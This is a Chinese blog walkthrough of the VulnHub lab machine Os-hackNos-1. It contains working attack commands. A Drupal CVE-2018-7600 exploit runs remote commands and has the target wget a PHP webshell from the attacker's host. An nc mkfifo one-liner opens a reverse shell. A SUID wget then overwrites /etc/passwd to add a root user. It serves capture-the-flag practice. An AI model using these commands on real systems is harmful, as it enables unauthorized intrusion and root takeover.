vulnhub靶机练习-Os-hackNos-1

已于 2022-10-06 15:25:47 修改
阅读量462 收藏
点赞数
分类专栏: 安全 靶机实战笔记 文章标签: 服务器 linux 运维
于 2022-10-05 23:05:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127172716
版权

靶机描述

难度容易到中 flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt

Difficulty : Easy to Intermediate

Flag : 2 Flag first user And second root

Learning : exploit | Web Application | Enumeration | Privilege Escalation

Website : www.hackNos.com

mail : contact@hackNos.com

靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

靶机配置,下载ova文件virtualBox导入即可

有个巨大的坑,vm导入失败尝试各种方法不行,下载virtualBox然后取消勾选软驱和启用USB控制器。最后成功打开虚拟靶机,网络也能访问

在virtualBox打开可以发现只有这个页面,我们不知道登录用户名和密码

 开始渗透

信息收集

ifconfig查看本机ip

192.168.1.53

内网主机扫描

netdiscover -r 192.168.1.1/24

扫描结果

 根据已知ip和主机介绍排除网关和本机kali主机以及已知主机ip104应该是目标机器的ip

nmap扫描端口

└─# nmap -sV -sC -A 192.168.1.104 -oA oshacknos1

扫描结果

根据结果对方开启了80端口和22端口浏览器能访问到Apache服务

 对目标进行目录扫描

gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

扫描结果

 发现目录drupal访问一下

 百度搜索drupal是个cms,下载源码可查看网站目录结构,找到版本介绍文件

访问http://192.168.1.104/drupal/CHANGELOG.txt

得知grupal的版本为 Drupal 7.57

github找到exp,复制到kali

查找漏洞获取shell

远程命令执行漏洞,执行相关命令

 http://192.168.1.104/drupal/sites/default/settings.php

查看配置文件收集信息

└─# python3 drupa7-CVE-2018-7600.py -c "cat sites/default/settings.php"  http://192.168.1.104/drupal/

找到数据库的相关配置信息

 在kali新建一句话木马,开启http服务,执行命令让目标机器下载木马,反弹shell

通过exp下载shell文件

└─# python3 drupa7-CVE-2018-7600.py -c "wget 192.168.1.53:8000/yesir.php"  http://192.168.1.104/drupal/

成功下载

打开bp yesir传参id,修改提交方法,返回结果命令执行成功 可以反弹shell。

 通过命令查找nc 是否存在 which nc 存在的情况下 用nc反弹

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+‐i+2>%261|nc+192.168.1.53+9001+>/tmp/fa

监听9001端口,nc -lvnp 9001

成功反弹shell

昨天遇到了一个问题反弹的shell执行不了python命令的问题,我修改了获取shell的方法,用msf使用drupal的exp直接利用获得shell

修改shell交互方式,使用python命令

python3 -c 'import pty;pty.spawn("/bin/bash")' 

查看passwd文件

cat /etc/passwd

查看有james用户和root用户

ls /home/james

发现有user.txt文件

cat  /home/james/user.txt

 cd ..

返回上级目录发现可疑文件

 查看可疑文件

 发现是串base64加密后的字符串,解密base64

解码之后的结果

在线解密

解密的结果james:Hacker@4514

 尝试登录

su james

失败

尝试ssh登录

也失败了

提升权限

通过suid提权 查找特权文件命令

find / ‐perm ‐u=s ‐type f 2>/dev/null

  

从上图可以看到 wget 是拥有root权限 即可以通过wget 下载可以替换文件。

 替换/etc/passwd

在kali上生成密码

openssl passwd ‐1 ‐salt yesir 123456

创建文件passwd 把 写入yesir 为root权限

执行命令替换passwd文件

在kali开启http服务

wget http://192.168.1.53:8000/passwd ‐O /etc/passwd

查看目标上的/etc/passwd 看到文件已经成功替换

上图可见多出yesir用户 

获取root.txt

su yesir 

输入密码获取root权限

 切换到根目录下查看root.txt

相逢一醉是前缘,风雨散、飘然何处

夜yesec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机Os-hackNos-1
Long_gone的博客
01-30 705
一、信息收集 首先扫描靶机IP: arp-scan 192.168.1.110 确定靶机IP为:192.168.1.110后,扫描靶机端口开放情况: nmap -sV -p 0-65535 192.168.1.110 可以看见靶机只开放了22和80端口,然后先访问一下80端口看一下: 是一个Apache2的页面,除此之外就没发现什么其他的东西了,然后再扫描一下目录看看会有什么发现: di...
VulnHubOs-hackNos-1
weixin_39219503的博客
12-22 520
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 题目信息如下,难度中等偏下,需要获取俩个flag Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : exploit | Web Ap...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
20210301HackNos-Os-hackNos-1靶机(第一次打靶机的心得体会和坑)
qq_45290991的博客
03-01 637
文章目录 练习笔记:一,信息收集二,获取目标的shell三,权限维持四,提权root权限维持: Os-hackNos-1靶机 实验主机:kali linux虚拟机(VM) 实验靶机Os-hackNos-1靶机(Virtualbox) 实验网...
靶机Hacknos-1
weixin_50815573的博客
02-21 1615
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHubOs-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
vulnhub靶机 Os-hackNos-1
qq_52178795的博客
06-16 126
vulnhub靶机 Os-hackNos-1打靶
vulhub - Os-hackNos-1
在下小黄的博客
09-09 510
一、环境搭建:Os-hackNos-1靶机 实验主机:kali linux 2021 虚拟机(VM) 实验靶机Os-hackNos-1靶机(VM) 实验网络:NAT模式 实验难度:简单 flag:1.普通用户的user.txt;2.root用户的user.txt 技能:漏洞利用 | web应用 | 暴力破解 | 权限提升 二、信息收集: 主机发现: 确认自己的信息: ifconfig 探测网段存活主机: nmap -sP 192.168.138.0/24 端口扫描: 探测操作系统及软
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
python-flask项目的服务器线上部署
weixin_74314406的博客
06-05 696
在 Flask 项目中,打包通常不是指将代码本身打包成一个可执行文件(因为 Flask 是一个 WSGI 应用,它通常运行在 Web 服务器和 WSGI 容器如 Gunicorn、uWSGI 等之上),而是指准备项目的所有必要文件和依赖,以便在其他环境(如生产服务器)上部署。如果你的 Flask 项目使用了如 Flask-Assets 这样的库来处理静态文件(如 CSS 和 JavaScript),你可能需要运行一个命令来收集这些文件到一个目录中,以便在生产环境中服务。这可以帮助您诊断任何潜在的问题。
NAT端口映射,实现外网访问内网服务器
最新发布
pyc68的博客
06-05 720
本篇文章利用Cisco Packet Tracer网络模拟进行NAT端口映射,实现外网访问内网服务器
网站企业需要适用于什么服务器
wanhengwangluo的博客
06-05 219
网站企业选择服务器必须考虑的因素就是数据信息的安全性,一般选择能够提供全面安全防护措施的云服务器,有着DDOS攻击防护、数据加密技术和合格的防火墙等多种防护措施,确保了网站数据的安全性和隐私保护。为了保证网站能够稳定的运行需要选择高可用性和可靠性的网站服务器,选择具备高可用性架构的云服务器供应商,能够提供多可用区部署、自动故障转移和备份恢复等功能,保障网站在各种故障情况下的持续运行。企业也可以选择适用不同的服务器,进行实际测试和评估,更能直观的了解服务器的性能,便于做出最后的决定。
i.MX8MP平台开发分享(RDC软件配置篇)
Muggle的博客
06-05 199
Uboot中已经将RDC的配置写入到了OCRAM中,NXP在ATF中预设了SIP服务,SIP服务下有厂商自定义的smc命令ID。例如下面的DDR、GPC、SRC和HAB的smc回调函数。在SRC中断处理函数中,对于SRC_M4_START指令,先读取OCRAM中的配置,然后初始化RDC。
虚拟机改IP地址
05-29 565
使用场景:当你从另一台电脑复制一个VMware虚拟机过来,就是遇到一个问题,虚拟的IP地址不一样(比如,一个是192.168.1.3,另一个是192.168.2.4,由于‘1’和‘2’不同,不是同一网段,是无法ping通的),无法ping通。可以看到有4个左右的网络,其中“VMware Network Adapter VMnet1”就是虚拟机“仅主机”模式下的网关,“VMware Network Adapter VMnet8”就是虚拟机“桥接”模式下的网关。做完以上步骤,就可以ping通啦。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值